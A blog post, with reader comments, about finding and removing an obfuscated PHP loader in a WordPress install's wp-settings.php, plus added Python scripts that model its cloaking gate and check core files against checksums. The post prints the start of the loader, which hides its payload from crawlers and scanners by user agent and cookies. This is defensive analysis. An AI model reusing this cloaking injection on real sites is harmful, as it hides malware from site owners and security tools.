This blog uses WordPress plus a very few plugins. That’s built on PHP. So, it’s just asking for trouble.
Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working. I’m a professional, so I provided the Guild’s standard response: “Works for me.” Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader. Finally I ran the RSS validator on it, which announced that there is a <script> tag in the feed. Eh, what! I don’t see that when doing view source in my browser. Hm.
Finally I pulled the feed with curl, and that version has the problem. Prepended to the RSS feed is a script that is compressed and obfuscated. The obfuscation means it’s got a lot of unique tokens in it, e.g. CeHxprJ, lJeVYuCF, UYwXC, and Google finds a copy of the script here: http://pastebay.com/82974 but that link has disappeared, presumably because that paste site has a setting that discards postings after 24 hours.
The infection in my blog was in wp-settings.php. A second <?php block had been inserted at the front of the file. That injected the script into every page, not just the RSS feed. Here’s the start of that code. As you can see, it isn’t really injected into every page: only for certain browsers, and then only if there aren’t any cookies yet. That explains why I didn’t see it in my browser, and I assume that how “generous in what they accept” the various RSS readers are explains which people were still getting my posts.
<?php
@ob_start();
@error_reporting(0);
if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT'])
   && strlen($_SERVER['HTTP_USER_AGENT'])>5
   && sizeof($_COOKIE)==0) {
print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); } etc
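The gate above is why “works for me” was the wrong test: a logged-in author has cookies, and crawlers and validators with a telling user agent are excluded, so only anonymous browser-like clients (and curl) get the payload. The following Python is an added illustration, not code from this blog or from WordPress. It mirrors the three conditions of the quoted gate to show which request profiles would have been served the script, and it checks a feed body for anything prepended before the XML declaration. All user agents, cookies and feed bodies are constructed sample values.

```python
import re

# Constructed mirror of the user-agent list in the injected block quoted
# above; added here for reasoning about who receives the payload.
CLOAK_UA = re.compile(
    r"googlebot|bot|yahoo|slurp|msnbot|spider|malware|virus|checker|baidu"
    r"|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker"
    r"|abuse|blacklist|norton",
    re.I,
)


def loader_would_fire(user_agent, cookies):
    """True when a request would have been served the injected <script>.

    The gate in the infected file requires all three: a user agent that
    does not look like a crawler or scanner, a user agent longer than five
    characters, and no cookies at all on the request.
    """
    return (
        not CLOAK_UA.search(user_agent)
        and len(user_agent) > 5
        and len(cookies) == 0
    )


def injected_prefix(body):
    """Return whatever precedes the RSS document, or '' if the feed is clean.

    A well-formed feed starts with the XML declaration or the <rss> root;
    the payload described above was prepended, so anything before that
    marker is foreign content worth inspecting.
    """
    match = re.search(r"<\?xml|<rss[\s>]", body)
    if match is None:
        return body  # no feed at all: treat the whole response as suspect
    return body[:match.start()].strip()


# Constructed request profiles modelled on the story above.
PROFILES = {
    "author browser, logged in": (
        "Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/3.5",
        {"wordpress_logged_in_abc": "author|123"},
    ),
    "reader with no cookies": ("Mozilla/5.0 (Windows NT 6.1) Gecko Firefox/3.5", {}),
    "curl": ("curl/7.19.7", {}),
    "googlebot": ("Googlebot/2.1 (+http://www.google.com/bot.html)", {}),
}

# Constructed feed bodies: one clean, one with a script tag prepended.
CLEAN_FEED = '<?xml version="1.0"?><rss version="2.0"><channel></channel></rss>'
INFECTED_FEED = "<script>function CeHxprJ(){/* obfuscated payload */}</script>" + CLEAN_FEED


def who_sees_it():
    """Map each constructed profile to whether the gate would fire for it."""
    return {name: loader_would_fire(ua, cookies) for name, (ua, cookies) in PROFILES.items()}


if __name__ == "__main__":
    for name, fired in who_sees_it().items():
        print(f"{name:28s} payload served: {fired}")
    print("clean feed prefix:   ", repr(injected_prefix(CLEAN_FEED)))
    print("infected feed prefix:", repr(injected_prefix(INFECTED_FEED)))
```

The practical lesson is in the profile table: to confirm a site is clean, fetch it the way an anonymous visitor would (browser-like user agent, no cookies), or skip the guesswork and compare files on disk against known-good checksums.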
I removed it. All the rest of the PHP files had md5 checksums that match the WordPress 2.9.1 distribution. Of course I am, presumably, still vulnerable to whatever infected the blog to begin with.
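Checking every core file’s md5 against the distribution, as done above, is the reliable way to find this kind of modification. The script below is an added example, not the blog’s or WordPress’s own code. It audits a directory against a manifest of known-good hashes, and for any file that fails its checksum it reports whether a second <?php block carrying the traits of the quoted loader (output buffering on, error reporting silenced, a user-agent gate) was prepended before the original one. It goes one step beyond the post by also flagging PHP files that are not in the manifest at all. The “core files”, their hashes and the infected sample are all constructed inside the script, so nothing here is a real WordPress 2.9.1 checksum.

```python
import hashlib
import os
import re
import tempfile

# Constructed stand-ins for pristine core files. Their md5 values are
# computed below, so the manifest is self-consistent but does not
# reproduce any real WordPress release checksum.
CLEAN_FILES = {
    "wp-settings.php": "<?php\n/**\n * Sets up common variables (constructed stand-in).\n */\n",
    "wp-load.php": "<?php\n/**\n * Bootstrap file (constructed stand-in).\n */\n",
}

# Traits of the prepended block quoted above: output buffering turned on,
# error reporting silenced, and a gate on the requesting user agent.
LOADER_TRAITS = re.compile(r"@ob_start\(\)|@error_reporting\(0\)|HTTP_USER_AGENT")


def md5_file(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(files):
    """Map file name to md5 of its known-good contents."""
    return {name: hashlib.md5(body.encode()).hexdigest() for name, body in files.items()}


def classify_modified(path):
    """Describe how a file that fails its checksum differs from a normal core file."""
    with open(path, "r", errors="replace") as f:
        text = f.read()
    opens = [m.start() for m in re.finditer(r"<\?php", text)]
    if len(opens) > 1:
        first_block = text[:opens[1]]  # everything before the original open tag
        if LOADER_TRAITS.search(first_block):
            return "modified: cloaking loader prepended before the original <?php block"
        return "modified: unexpected second <?php block"
    if opens and opens[0] > 0:
        return "modified: content before the opening <?php tag"
    return "modified: checksum mismatch"


def audit(root, manifest):
    """Return {name: finding} for every deviation from the manifest under root."""
    findings = {}
    for name, expected in manifest.items():
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            findings[name] = "missing"
        elif md5_file(path) != expected:
            findings[name] = classify_modified(path)
    for dirpath, _, files in os.walk(root):
        for fn in files:
            rel = os.path.relpath(os.path.join(dirpath, fn), root)
            if fn.endswith(".php") and rel not in manifest:
                findings[rel] = "unexpected php file not in distribution"
    return findings


def demo():
    """Build a constructed install, infect it the way the post describes, audit both states."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in CLEAN_FILES.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(body.encode())
        manifest = build_manifest(CLEAN_FILES)
        clean_findings = audit(root, manifest)
        # Constructed loader with the same shape as the one quoted above;
        # the script body is a placeholder, not the real payload.
        loader = ("<?php @ob_start();@error_reporting(0);"
                  "if(!preg_match('/bot|spider/i', $_SERVER['HTTP_USER_AGENT'])"
                  " && sizeof($_COOKIE)==0){print \"<script>/* placeholder */</script>\";} ?>")
        with open(os.path.join(root, "wp-settings.php"), "wb") as f:
            f.write((loader + CLEAN_FILES["wp-settings.php"]).encode())
        with open(os.path.join(root, "wp-x.php"), "wb") as f:  # constructed dropped file
            f.write(b"<?php /* constructed dropped file */ ?>")
        return clean_findings, audit(root, manifest)


if __name__ == "__main__":
    before, after = demo()
    print("clean install:", before)
    for name, finding in after.items():
        print(f"{name}: {finding}")
```

Against a real install you would build the manifest from a pristine copy of the same WordPress version rather than from constructed strings, and run the audit from cron so a reinfection shows up before your readers notice.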
Bleck.
Thanks for the removal tip. This also happened on a blog I maintain on Earthlink. Have you found any more info about how this could happen?
Tom – You’re welcome. I’ve no news about how it happened. Note that I can tell a window in time it happened from when the RSS feed broke for people.
My search on some terms in the malicious script and on wordpress.org turned up only your blog post for info! Wonder if it’s too new?
Tom – Yeah, maybe new. Maybe the compression varies. Maybe most people affected don’t know, and those that do don’t go public.
Pingback: Ascription is an Anathema to any Enthusiasm › Blog Hacks, a bit more info.
Pingback: My WordPress Installation Hacked on Netfirms